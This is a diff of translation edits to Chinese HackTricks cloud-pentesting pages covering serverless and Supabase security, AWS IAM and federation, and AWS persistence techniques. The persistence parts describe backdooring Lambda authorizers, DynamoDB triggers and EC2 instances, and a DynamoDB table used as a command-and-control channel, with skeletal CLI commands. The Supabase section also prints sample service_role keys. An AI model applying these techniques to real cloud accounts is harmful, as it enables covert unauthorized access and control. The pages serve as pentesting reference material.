- **启用详细日志记录:** 捕获重要信息而不暴露敏感数据。
-- **设置警报:** 配置对可疑活动或异常的警报。
+- **设置警报:** 配置可疑活动或异常的警报。
- **定期监控:** 持续监控日志和指标以发现潜在的安全事件。
---
-### **不安全的API网关配置**
+### **不安全的 API 网关配置**
-开放或不当保护的API可能被利用进行未经授权的访问、拒绝服务(DoS)攻击或跨站攻击。
+开放或不当保护的 API 可能被利用进行未经授权的访问、拒绝服务 (DoS) 攻击或跨站攻击。
#### **缓解策略**
-- **身份验证和授权:** 实施强大的机制,如OAuth、API密钥或JWT。
+- **身份验证和授权:** 实施强大的机制,如 OAuth、API 密钥或 JWT。
```yaml
functions:
@@ -645,7 +645,7 @@ burstLimit: 200
rateLimit: 100
```
-- **安全的CORS配置:** 限制允许的来源、方法和头部。
+- **安全的 CORS 配置:** 限制允许的来源、方法和头部。
```yaml
functions:
@@ -661,7 +661,7 @@ headers:
- Content-Type
```
-- **使用Web应用防火墙(WAF):** 过滤和监控HTTP请求以检测恶意模式。
+- **使用 Web 应用防火墙 (WAF):** 过滤和监控 HTTP 请求以检测恶意模式。
---
@@ -671,9 +671,9 @@ headers:
#### **缓解策略**
-- **隔离功能:** 分配不同的资源和IAM角色以确保独立操作。
-- **资源分区:** 为不同的功能使用单独的数据库或存储桶。
-- **使用VPC:** 在虚拟私有云中部署功能以增强网络隔离。
+- **隔离函数:** 分配独特的资源和 IAM 角色以确保独立操作。
+- **资源分区:** 为不同的函数使用单独的数据库或存储桶。
+- **使用 VPC:** 在虚拟私有云中部署函数以增强网络隔离。
```yaml
provider:
@@ -684,7 +684,7 @@ subnetIds:
- subnet-xxxxxx
```
-- **限制功能权限:** 确保功能不能访问或干扰彼此的资源,除非明确需要。
+- **限制函数权限:** 确保函数无法访问或干扰彼此的资源,除非明确需要。
---
@@ -706,8 +706,8 @@ SSESpecification:
SSEEnabled: true
```
-- **加密传输中的数据:** 对所有数据传输使用HTTPS/TLS。
-- **安全的API通信:** 强制执行加密协议并验证证书。
+- **加密传输中的数据:** 对所有数据传输使用 HTTPS/TLS。
+- **安全的 API 通信:** 强制执行加密协议并验证证书。
- **安全管理加密密钥:** 使用托管密钥服务并定期轮换密钥。
---
@@ -735,21 +735,21 @@ body: JSON.stringify({ message: 'Internal Server Error' }),
};
```
-- **集中错误处理:** 在所有功能中一致地管理和清理错误。
+- **集中错误处理:** 在所有函数中一致地管理和清理错误。
- **监控和记录错误:** 跟踪和分析内部错误,而不向最终用户暴露细节。
---
### **不安全的部署实践**
-暴露的部署配置或对CI/CD管道的未经授权访问可能导致恶意代码部署或配置错误。
+暴露的部署配置或对 CI/CD 管道的未经授权访问可能导致恶意代码部署或配置错误。
#### **缓解策略**
-- **安全的CI/CD管道:** 实施严格的访问控制、多因素身份验证(MFA)和定期审计。
+- **安全的 CI/CD 管道:** 实施严格的访问控制、多因素身份验证 (MFA) 和定期审计。
- **安全存储配置:** 确保部署文件不包含硬编码的秘密和敏感数据。
-- **使用基础设施即代码(IaC)安全工具:** 使用像**Checkov**或**Terraform Sentinel**这样的工具来强制执行安全策略。
-- **不可变部署:** 通过采用不可变基础设施实践来防止部署后未经授权的更改。
+- **使用基础设施即代码 (IaC) 安全工具:** 使用 **Checkov** 或 **Terraform Sentinel** 等工具来强制执行安全策略。
+- **不可变部署:** 通过采用不可变基础设施实践,防止部署后未经授权的更改。
---
@@ -761,20 +761,20 @@ body: JSON.stringify({ message: 'Internal Server Error' }),
- **彻底审查插件:** 在集成之前评估插件的安全性,优先选择来自信誉良好的来源的插件。
- **限制插件使用:** 仅使用必要的插件以最小化攻击面。
-- **监控插件更新:** 保持插件更新以受益于安全补丁。
-- **隔离插件环境:** 在隔离环境中运行插件以限制潜在的妥协。
+- **监控插件更新:** 保持插件更新,以便受益于安全补丁。
+- **隔离插件环境:** 在隔离环境中运行插件,以限制潜在的妥协。
---
### **敏感端点的暴露**
-公开可访问的功能或不受限制的API可能被利用进行未经授权的操作。
+公开可访问的函数或不受限制的 API 可能被利用进行未经授权的操作。
#### **缓解策略**
-- **限制功能访问:** 使用VPC、安全组和防火墙规则限制对受信任来源的访问。
+- **限制函数访问:** 使用 VPC、安全组和防火墙规则限制对受信任来源的访问。
- **实施强大的身份验证:** 确保所有公开的端点都需要适当的身份验证和授权。
-- **安全使用API网关:** 配置API网关以强制执行安全策略,包括输入验证和速率限制。
+- **安全使用 API 网关:** 配置 API 网关以强制执行安全策略,包括输入验证和速率限制。
- **禁用未使用的端点:** 定期审查并禁用任何不再使用的端点。
---
@@ -791,10 +791,10 @@ body: JSON.stringify({ message: 'Internal Server Error' }),
### **访问密钥和许可证密钥安全**
-**访问密钥**和**许可证密钥**是用于验证和授权与Serverless Framework CLI交互的关键凭据。
+**访问密钥**和**许可证密钥**是用于验证和授权与 Serverless Framework CLI 交互的关键凭据。
-- **许可证密钥:** 它们是用于验证对Serverless Framework版本4的访问的唯一标识符,允许通过CLI登录。
-- **访问密钥:** 允许Serverless Framework CLI与Serverless Framework Dashboard进行身份验证的凭据。当使用`serverless` cli登录时,访问密钥将**生成并存储在笔记本电脑中**。您还可以将其设置为名为`SERVERLESS_ACCESS_KEY`的环境变量。
+- **许可证密钥:** 它们是用于验证对 Serverless Framework 版本 4 的访问的唯一标识符,允许通过 CLI 登录。
+- **访问密钥:** 允许 Serverless Framework CLI 与 Serverless Framework Dashboard 进行身份验证的凭据。当使用 `serverless` cli 登录时,将**生成并存储在笔记本电脑中**的访问密钥。您还可以将其设置为名为 `SERVERLESS_ACCESS_KEY` 的环境变量。
#### **安全风险**
diff --git a/src/pentesting-ci-cd/supabase-security.md b/src/pentesting-ci-cd/supabase-security.md
index 7e63051f9..00d1511ba 100644
--- a/src/pentesting-ci-cd/supabase-security.md
+++ b/src/pentesting-ci-cd/supabase-security.md
@@ -1,10 +1,10 @@
-# Supabase Security
+# Supabase 安全
{{#include ../banners/hacktricks-training.md}}
## 基本信息
-根据他们的 [**登陆页面**](https://supabase.com/): Supabase 是一个开源的 Firebase 替代品。使用 Postgres 数据库、身份验证、即时 API、边缘函数、实时订阅、存储和向量嵌入开始您的项目。
+根据他们的 [**着陆页**](https://supabase.com/): Supabase 是一个开源的 Firebase 替代品。使用 Postgres 数据库、身份验证、即时 API、边缘函数、实时订阅、存储和向量嵌入开始您的项目。
### 子域名
@@ -13,7 +13,7 @@
## **数据库配置**
> [!TIP]
-> **可以通过链接 `https://supabase.com/dashboard/project//settings/database` 访问这些数据**
+> **可以通过链接访问这些数据,如 `https://supabase.com/dashboard/project//settings/database`**
这个 **数据库** 将部署在某个 AWS 区域,为了连接到它,可以通过以下方式连接:`postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres`(这是在 us-west-1 创建的)。\
密码是用户之前设置的 **密码**。
@@ -31,13 +31,13 @@
## API 配置
> [!TIP]
-> **可以通过链接 `https://supabase.com/dashboard/project//settings/api` 访问这些数据**
+> **可以通过链接访问这些数据,如 `https://supabase.com/dashboard/project//settings/api`**
访问您项目中 supabase API 的 URL 将类似于:`https://jnanozjdybtpqgcwhdiz.supabase.co`。
### 匿名 API 密钥
-它还将生成一个 **匿名 API 密钥** (`role: "anon"`),如:`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk`,应用程序需要使用它来联系我们示例中暴露的 API 密钥。
+它还将生成一个 **匿名 API 密钥** (`role: "anon"`),如:`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk`,应用程序需要使用它来联系我们示例中的 API 密钥。
可以在 [**文档**](https://supabase.com/docs/reference/self-hosting-auth/returns-the-configuration-settings-for-the-gotrue-server) 中找到联系此 API 的 API REST,但最有趣的端点将是:
@@ -99,26 +99,26 @@ Priority: u=1, i
```
-所以,每当你发现一个客户使用 supabase 和他们被授予的子域名时(公司的一个子域名可能有一个 CNAME 指向他们的 supabase 子域名),你可以尝试 **使用 supabase API 创建一个新账户**。
+因此,每当您发现客户使用其被授予的子域名的 supabase(公司可能有一个 CNAME 指向他们的 supabase 子域名),您可以尝试 **使用 supabase API 创建一个新账户**。
### secret / service_role api keys
-一个秘密 API 密钥也会生成 **`role: "service_role"`**。这个 API 密钥应该是秘密的,因为它能够绕过 **行级安全**。
+将生成一个秘密 API 密钥,**`role: "service_role"`**。这个 API 密钥应该是秘密的,因为它能够绕过 **行级安全**。
-API 密钥看起来像这样: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
+API 密钥看起来像这样:`eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`
### JWT Secret
-一个 **JWT Secret** 也会被生成,以便应用程序可以 **创建和签署自定义 JWT 令牌**。
+还将生成一个 **JWT Secret**,以便应用程序可以 **创建和签名自定义 JWT 令牌**。
## 认证
### 注册
> [!TIP]
-> 默认情况下,supabase 将允许 **新用户在你的项目中创建账户**,通过使用之前提到的 API 端点。
+> 默认情况下,supabase 将允许 **新用户在您的项目中创建账户**,使用之前提到的 API 端点。
-然而,这些新账户默认情况下 **需要验证他们的电子邮件地址** 才能登录账户。可以启用 **“允许匿名登录”** 以允许人们在不验证电子邮件地址的情况下登录。这可能会授予对 **意外数据** 的访问(他们获得角色 `public` 和 `authenticated`)。\
+然而,这些新账户默认情况下 **需要验证他们的电子邮件地址** 才能登录账户。可以启用 **“允许匿名登录”** 以允许人们在不验证电子邮件地址的情况下登录。这可能会授予对 **意外数据** 的访问(他们获得 `public` 和 `authenticated` 角色)。\
这是一个非常糟糕的主意,因为 supabase 按活跃用户收费,因此人们可以创建用户并登录,而 supabase 将为这些用户收费:
```
@@ -130,7 +130,7 @@ aws sts get-session-token --serial-number --token-code
### [IAM用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html)
-IAM [用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) 是一种**一次性将策略附加到多个用户**的方法,这可以使管理这些用户的权限变得更容易。**角色和组不能成为组的一部分**。
+IAM [用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) 是一种**一次性将策略附加到多个用户**的方法,这可以更容易地管理这些用户的权限。**角色和组不能成为组的一部分**。
您可以将**基于身份的策略附加到用户组**,以便用户组中的所有**用户**都**接收该策略的权限**。您**不能**在**策略**(例如基于资源的策略)中将**用户组**标识为**`Principal`**,因为组与权限相关,而不是身份验证,主体是经过身份验证的IAM实体。
@@ -139,17 +139,17 @@ IAM [用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html)
- 一个用户**组**可以**包含多个用户**,而一个**用户**可以**属于多个组**。
- **用户组不能嵌套**;它们只能包含用户,而不能包含其他用户组。
- **没有默认的用户组会自动包含AWS账户中的所有用户**。如果您想要这样的用户组,您必须创建它并将每个新用户分配给它。
-- AWS账户中IAM资源的数量和大小是有限制的,例如组的数量,以及用户可以成为成员的组的数量。有关更多信息,请参见[IAM和AWS STS配额](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html)。
+- AWS账户中IAM资源的数量和大小是有限的,例如组的数量,以及用户可以成为成员的组的数量。有关更多信息,请参见[IAM和AWS STS配额](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html)。
### [IAM角色](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html)
-IAM **角色**与**用户**非常**相似**,因为它是一个**具有权限策略的身份,决定了它在AWS中可以做什么和不能做什么**。然而,角色**没有任何凭证**(密码或访问密钥)与之关联。角色不是唯一与一个人关联,而是旨在**被任何需要它的人(并且有足够权限)假设**。IAM用户可以假设一个角色以**临时**承担特定任务的不同权限。角色可以被[**联合用户**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html)分配,该用户通过使用外部身份提供者而不是IAM进行登录。
+IAM **角色**与**用户**非常**相似**,因为它是一个**具有权限策略的身份,决定它在AWS中可以做什么和不能做什么**。然而,角色**没有任何凭证**(密码或访问密钥)与之关联。角色的设计目的是**可以被任何需要它的人(并且有足够权限)假设**。IAM用户可以假设一个角色以临时**承担特定任务的不同权限**。角色可以分配给使用外部身份提供者而不是IAM登录的[**联合用户**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html)。
IAM角色由**两种类型的策略**组成:**信任策略**,不能为空,定义**谁可以假设**该角色,以及**权限策略**,不能为空,定义**它可以访问什么**。
#### AWS安全令牌服务(STS)
-AWS安全令牌服务(STS)是一个网络服务,促进**临时、有限权限凭证的发放**。它专门针对:
+AWS安全令牌服务(STS)是一个网络服务,促进**临时、有限权限凭证的发放**。它专门用于:
### [IAM中的临时凭证](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html)
@@ -164,8 +164,8 @@ AWS安全令牌服务(STS)是一个网络服务,促进**临时、有限权
- AWS管理策略(由AWS预配置)
- 客户管理策略:由您配置。您可以基于AWS管理策略创建策略(修改其中一个并创建自己的),使用策略生成器(一个帮助您授予和拒绝权限的GUI视图)或编写自己的策略。
-默认情况下,访问**被拒绝**,如果指定了明确的角色,则将授予访问权限。\
-如果**存在单个“拒绝”**,它将覆盖“允许”,但AWS账户的根安全凭证的请求(默认允许)除外。
+默认情况下,访问是**被拒绝的**,如果指定了明确的角色,则将授予访问权限。\
+如果**存在单个“拒绝”**,它将覆盖“允许”,但AWS账户的根安全凭证(默认允许)使用的请求除外。
```javascript
{
"Version": "2012-10-17", //Version of the policy
@@ -188,8 +188,8 @@ AWS安全令牌服务(STS)是一个网络服务,促进**临时、有限权
]
}
```
-The [全球字段可以在任何服务中用于条件的文档在这里](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\
-The [每个服务中可以用于条件的特定字段的文档在这里](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html).
+[可以在任何服务中用于条件的全局字段在这里记录](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount)。\
+[每个服务中可以用于条件的特定字段在这里记录](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html)。
#### 内联策略
@@ -200,21 +200,21 @@ The [每个服务中可以用于条件的特定字段的文档在这里](https:/
这些是可以在**资源**中定义的**策略**。**并非所有AWS资源都支持它们**。
-如果主体没有对它们的明确拒绝,并且资源策略授予他们访问权限,则他们被允许。
+如果主体没有对它们的明确拒绝,并且资源策略授予它们访问权限,则允许它们。
### IAM边界
-IAM边界可以用于**限制用户或角色应有的权限**。这样,即使通过**不同的策略**授予用户不同的权限,如果他尝试使用它们,操作将**失败**。
+IAM边界可以用来**限制用户或角色应有的权限**。这样,即使通过**不同的策略**授予用户不同的权限,如果他尝试使用它们,操作将**失败**。
边界只是附加到用户的策略,**指示用户或角色可以拥有的最大权限级别**。因此,**即使用户具有管理员访问权限**,如果边界指示他只能读取S·桶,那就是他能做的最大事情。
-**这**、**SCPs**和**遵循最小权限**原则是控制用户没有超过其所需权限的方法。
+**这**、**SCPs**和**遵循最小权限**原则是控制用户权限不超过其所需权限的方式。
### 会话策略
-会话策略是**在某种情况下假定角色时设置的策略**。这将像是该会话的**IAM边界**:这意味着会话策略不授予权限,而是**将权限限制为策略中指示的权限**(最大权限是角色拥有的权限)。
+会话策略是**在角色被假设时设置的策略**。这将像是该会话的**IAM边界**:这意味着会话策略不授予权限,而是**将权限限制为策略中指示的权限**(最大权限为角色所拥有的权限)。
-这对于**安全措施**非常有用:当管理员要假定一个非常特权的角色时,他可以将权限限制为仅在会话策略中指示的权限,以防会话被破坏。
+这对于**安全措施**非常有用:当管理员要假设一个非常特权的角色时,他可以将权限限制为仅在会话策略中指示的权限,以防会话被破坏。
```bash
aws sts assume-role \
--role-arn \
@@ -222,26 +222,26 @@ aws sts assume-role \
[--policy-arns ]
[--policy ]
```
-注意,默认情况下,**AWS 可能会向即将生成的会话添加会话策略**,这是由于第三方原因。例如,在[未经身份验证的 Cognito 假定角色](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles)中,默认情况下(使用增强身份验证),AWS 将生成**带有会话策略的会话凭证**,该策略限制会话可以访问的服务[**为以下列表**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services)。
+注意,默认情况下,**AWS 可能会将会话策略添加到即将生成的会话**,这是由于其他原因。例如,在 [未认证的 Cognito 假定角色](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) 中,默认情况下(使用增强认证),AWS 将生成 **带有会话策略的会话凭证**,该策略限制会话可以访问的服务 [**为以下列表**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services)。
-因此,如果在某个时刻你遇到错误“...因为没有会话策略允许...”,而角色有权限执行该操作,那是因为**有一个会话策略阻止了它**。
+因此,如果在某个时刻你遇到错误“...因为没有会话策略允许...”,而角色有权限执行该操作,那是因为 **有一个会话策略阻止了它**。
### 身份联合
-身份联合**允许来自外部身份提供者的用户**安全地访问 AWS 资源,而无需提供有效 IAM 用户帐户的 AWS 用户凭证。\
-身份提供者的一个例子可以是你自己的企业**Microsoft Active Directory**(通过**SAML**)或**OpenID**服务(如**Google**)。联合访问将允许其中的用户访问 AWS。
+身份联合 **允许来自外部身份提供者的用户** 安全地访问 AWS 资源,而无需提供有效 IAM 用户帐户的 AWS 用户凭证。\
+身份提供者的一个例子可以是你自己的企业 **Microsoft Active Directory**(通过 **SAML**)或 **OpenID** 服务(如 **Google**)。联合访问将允许其中的用户访问 AWS。
-要配置此信任,生成一个**IAM 身份提供者(SAML 或 OAuth)**,该提供者将**信任****其他平台**。然后,至少一个**IAM 角色被分配(信任)给身份提供者**。如果来自受信任平台的用户访问 AWS,他将以提到的角色进行访问。
+要配置这种信任,生成一个 **IAM 身份提供者(SAML 或 OAuth)**,该提供者将 **信任** **其他平台**。然后,至少一个 **IAM 角色被分配(信任)给身份提供者**。如果来自受信平台的用户访问 AWS,他将以提到的角色进行访问。
-然而,通常你会希望根据第三方平台中用户的**组别给予不同的角色**。然后,多个**IAM 角色可以信任**第三方身份提供者,第三方平台将允许用户假定一个角色或另一个角色。
+然而,通常你会希望根据第三方平台中用户的组给予 **不同的角色**。然后,多个 **IAM 角色可以信任** 第三方身份提供者,第三方平台将是允许用户假定一个角色或另一个角色的。
.png)
.awsapps.com`。
+登录域将类似于 `.awsapps.com`。
要登录用户,可以使用 3 个身份源:
@@ -251,22 +251,22 @@ AWS IAM 身份中心(AWS 单点登录的继任者)扩展了 AWS 身份和访
.png)
--role-session-name sessname`)并配置凭证。
+如果您需要访问**不同的AWS账户**,并且您的配置文件被授予访问**假设这些账户中的角色**的权限,您就不需要每次手动调用STS(`aws sts assume-role --role-arn --role-session-name sessname`)并配置凭证。
您可以使用`~/.aws/config`文件来[**指示要假设的角色**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html),然后像往常一样使用`--profile`参数(`assume-role`将以透明的方式为用户执行)。\
配置文件示例:
@@ -353,7 +353,7 @@ sts_regional_endpoints = regional
```
aws --profile acc2 ...
```
-如果您正在寻找类似的东西,但针对**浏览器**,您可以查看**扩展** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en)。
+如果您正在寻找类似的东西,但用于**浏览器**,您可以查看**扩展** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en)。
## 参考文献
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
index ee9ea8ce7..eb31163a0 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -44,7 +44,7 @@ https://book.hacktricks.xyz/pentesting-web/saml-attacks
]
}
```
-6. 请注意在前面的策略中,只有来自 **组织** 的 **存储库** 的一个 **分支** 被授权具有特定的 **触发器**。
+6. 请注意在前面的策略中,只有 **组织** 的 **存储库** 中的一个 **分支** 被授权具有特定的 **触发器**。
7. github action 将能够 **冒充** 的 **角色** 的 **ARN** 将是 github action 需要知道的“秘密”,因此 **将其存储** 在 **环境** 中的 **秘密** 内。
8. 最后,使用 github action 配置工作流将使用的 AWS 凭据:
```yaml
@@ -108,13 +108,13 @@ eksctl utils associate-iam-oidc-provider --cluster Testing --approve
]
}
```
-该策略正确地指示**只有**具有**id** `20C159CDF6F2349B68846BEC03BE031B`的**EKS集群**可以承担该角色。然而,它并没有指明哪个服务账户可以承担它,这意味着**任何具有Web身份令牌的服务账户**都将**能够承担**该角色。
+该策略正确地指示**只有**具有**id** `20C159CDF6F2349B68846BEC03BE031B`的**EKS集群**可以假设该角色。然而,它没有指明哪个服务账户可以假设它,这意味着**任何具有Web身份令牌的服务账户**都将**能够假设**该角色。
-为了指定**哪个服务账户应该能够承担该角色,**需要指定一个**条件**,其中**指定服务账户名称**,例如:
+为了指定**哪个服务账户应该能够假设该角色,**需要指定一个**条件**,其中**指定服务账户名称,**例如:
```bash
"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
```
-## References
+## 参考
- [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
index cde637d91..199375575 100644
--- a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
@@ -10,8 +10,8 @@
- **access-analyzer:Get\***
- **iam:CreateServiceLinkedRole**
- **access-analyzer:CreateAnalyzer**
-- 如果客户为您生成分析器,则可选,但通常直接请求此权限更容易)
+- 如果客户为您生成分析器,则为可选,但通常只需请求此权限更容易)
- **access-analyzer:DeleteAnalyzer**
-- 如果客户为您删除分析器,则可选,但通常直接请求此权限更容易)
+- 如果客户为您删除分析器,则为可选,但通常只需请求此权限更容易)
{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
index 93f423119..aac4a0b64 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
@@ -4,7 +4,7 @@
## API Gateway
-有关更多信息,请访问:
+更多信息请访问:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
@@ -17,16 +17,16 @@
### Modify Lambda Authorizers
修改 lambda 授权者的代码以授予自己对所有端点的访问权限。\
-或者只需删除授权者的使用。
+或者直接移除授权者的使用。
### IAM Permissions
如果资源使用 IAM 授权者,您可以通过修改 IAM 权限来授予自己访问权限。\
-或者只需删除授权者的使用。
+或者直接移除授权者的使用。
### API Keys
如果使用了 API 密钥,您可以泄露它们以保持持久性,甚至创建新的密钥。\
-或者只需删除 API 密钥的使用。
+或者直接移除 API 密钥的使用。
{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
index f6fc5df40..412dc2b92 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
@@ -1,4 +1,4 @@
-# AWS - Cognito Persistence
+# AWS - Cognito 持久性
{{#include ../../../banners/hacktricks-training.md}}
@@ -15,10 +15,10 @@
Cognito 是一个允许为未认证和已认证用户分配角色并控制用户目录的服务。可以更改几种不同的配置以保持某种持久性,例如:
- **将用户池**添加到由用户控制的身份池
-- 为**未认证身份池**提供**IAM角色并允许基本身份验证流程**
+- 为未认证身份池提供一个**IAM角色并允许基本身份验证流程**
- 或者为**已认证身份池**提供角色,如果攻击者可以登录
- 或者**提高给定角色的权限**
-- **通过受控属性的用户或新用户在**用户池中**创建、验证和权限提升**
+- **通过受控属性创建、验证和权限提升**用户或新用户在**用户池**中
- **允许外部身份提供者**在用户池或身份池中登录
查看如何执行这些操作
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
index 15d7ea70c..6cf7e4c65 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
@@ -12,7 +12,7 @@
### 使用 Lambda 后门的 DynamoDB 触发器
-通过使用 DynamoDB 触发器,攻击者可以通过将恶意 Lambda 函数与表关联来创建一个 **隐蔽的后门**。当添加、修改或删除项目时,可以触发 Lambda 函数,从而允许攻击者在 AWS 账户内执行任意代码。
+通过使用 DynamoDB 触发器,攻击者可以通过将恶意 Lambda 函数与表关联来创建一个 **隐秘的后门**。当添加、修改或删除项目时,可以触发 Lambda 函数,从而允许攻击者在 AWS 账户内执行任意代码。
```bash
# Create a malicious Lambda function
aws lambda create-function \
@@ -34,7 +34,7 @@ aws lambda create-event-source-mapping \
--event-source \
--region
```
-为了保持持久性,攻击者可以在DynamoDB表中创建或修改项目,这将触发恶意的Lambda函数。这允许攻击者在AWS账户内执行代码,而无需直接与Lambda函数交互。
+为了保持持久性,攻击者可以在DynamoDB表中创建或修改项目,这将触发恶意的Lambda函数。这使得攻击者能够在AWS账户内执行代码,而无需直接与Lambda函数交互。
### DynamoDB作为C2通道
@@ -54,6 +54,6 @@ aws dynamodb put-item \
--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
--region
```
-被攻陷的实例或 Lambda 函数可以定期检查 C2 表以获取新命令,执行它们,并可选择将结果报告回表中。这使攻击者能够保持对被攻陷资源的持久性和控制。
+被攻陷的实例或 Lambda 函数可以定期检查 C2 表以获取新命令,执行这些命令,并可选择将结果报告回表中。这使攻击者能够保持对被攻陷资源的持久性和控制。
{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
index 4e8eaf642..907c789b0 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
@@ -18,7 +18,7 @@
### EC2 生命周期管理器
-该服务允许**调度**创建**AMI 和快照**,甚至**与其他账户共享**。\
+该服务允许**调度**创建 AMI 和快照,甚至**与其他账户共享**。\
攻击者可以配置**每周生成所有镜像或所有卷的 AMI 或快照**并**与他的账户共享**。
### 定时实例
@@ -27,14 +27,14 @@
### Spot Fleet 请求
-Spot 实例比常规实例**便宜**。攻击者可以发起一个**为期 5 年的小型 Spot Fleet 请求**(例如),并**自动分配 IP**,以及一个**用户数据**,在**Spot 实例启动时**发送给攻击者**IP 地址**和**高权限 IAM 角色**。
+Spot 实例比常规实例**便宜**。攻击者可以发起一个**为期 5 年的小型 Spot Fleet 请求**(例如),并**自动分配 IP**,以及一个**用户数据**,在 Spot 实例启动时发送给攻击者**和 IP 地址**,并带有**高权限的 IAM 角色**。
### 后门实例
攻击者可以访问实例并对其进行后门处理:
- 例如使用传统的**rootkit**
-- 添加一个新的**公共 SSH 密钥**(查看 [EC2 权限提升选项](../aws-privilege-escalation/aws-ec2-privesc.md))
+- 添加新的**公共 SSH 密钥**(查看 [EC2 权限提升选项](../aws-privilege-escalation/aws-ec2-privesc.md))
- 对**用户数据**进行后门处理
### **后门启动配置**
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
index 95a579b72..b7ded6a9f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
